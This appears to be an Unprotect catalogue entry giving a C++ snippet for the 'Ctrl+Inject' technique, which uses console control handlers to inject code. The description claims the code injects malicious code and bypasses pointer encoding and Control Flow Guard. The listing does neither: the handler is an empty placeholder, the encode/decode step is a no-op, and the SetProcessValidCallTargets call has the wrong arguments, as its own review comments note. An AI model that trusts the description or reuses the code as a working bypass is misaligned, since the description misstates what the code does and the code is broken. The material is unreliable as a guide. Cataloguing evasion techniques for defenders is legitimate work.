(C++) Ctrl+Inject by Unprotect

Created on Thursday 29 December 2022. Updated 1 year, 3 months ago.

Description:

This code first defines a callback function called ControlSignalHandler that will be used to inject malicious code. It then bypasses pointer encoding and control flow guard to ensure that the function can be called. Finally, it sets the callback function for control signal handlers using the SetConsoleCtrlHandler function and triggers a control signal by calling GenerateConsoleCtrlEvent.

Code

            #include <Windows.h>
#include <cstdio>

// Console control handler that main() registers with SetConsoleCtrlHandler.
// dwCtrlType carries the CTRL_* event code; the body is a placeholder on this
// page, so the event is ignored. Returning TRUE reports the event as handled,
// which stops the console from running the remaining handlers (including the
// default one) for it.
BOOL WINAPI ControlSignalHandler(DWORD dwCtrlType)
{
    (void)dwCtrlType;  // placeholder: the event code is not inspected

    return TRUE;
}

int main()
{
    // EncodePointer/DecodePointer round-trip: decodedPointer ends up equal to
    // ControlSignalHandler again, so nothing is bypassed here; the pair only
    // shows the encode/decode API in use. The result is not checked.
    void* encodedPointer = EncodePointer((PVOID)ControlSignalHandler);
    void* decodedPointer = DecodePointer(encodedPointer);

    // NOTE(review): the documented SetProcessValidCallTargets prototype takes
    // five arguments (process handle, region base, region size, offset count,
    // CFG_CALL_TARGET_INFO array); this three-argument call does not match it,
    // so the listing is unlikely to compile against the SDK header as written.
    // Its BOOL return value is also unchecked. Because it is called with
    // GetCurrentProcess(), it could at most affect the calling process, and
    // ControlSignalHandler is presumably already a valid call target since its
    // address is taken in this same module — confirm against a CFG-enabled build.
    SetProcessValidCallTargets(GetCurrentProcess(), (UINT_PTR)decodedPointer, sizeof(void*));

    // Registers the handler for this process's console. The return value is not
    // checked, so a failed registration silently leaves default Ctrl+C handling
    // (process termination) in place.
    SetConsoleCtrlHandler((PHANDLER_ROUTINE)decodedPointer, TRUE);

    // dwProcessGroupId 0 delivers the Ctrl+C event to every process attached to
    // this console, not only to this one. The return value is not checked.
    // NOTE(review): handler routines run on a separate thread and main returns
    // immediately below, so the process may exit before ControlSignalHandler
    // runs — confirm whether a wait is intended.
    GenerateConsoleCtrlEvent(CTRL_C_EVENT, 0);

    return 0;
}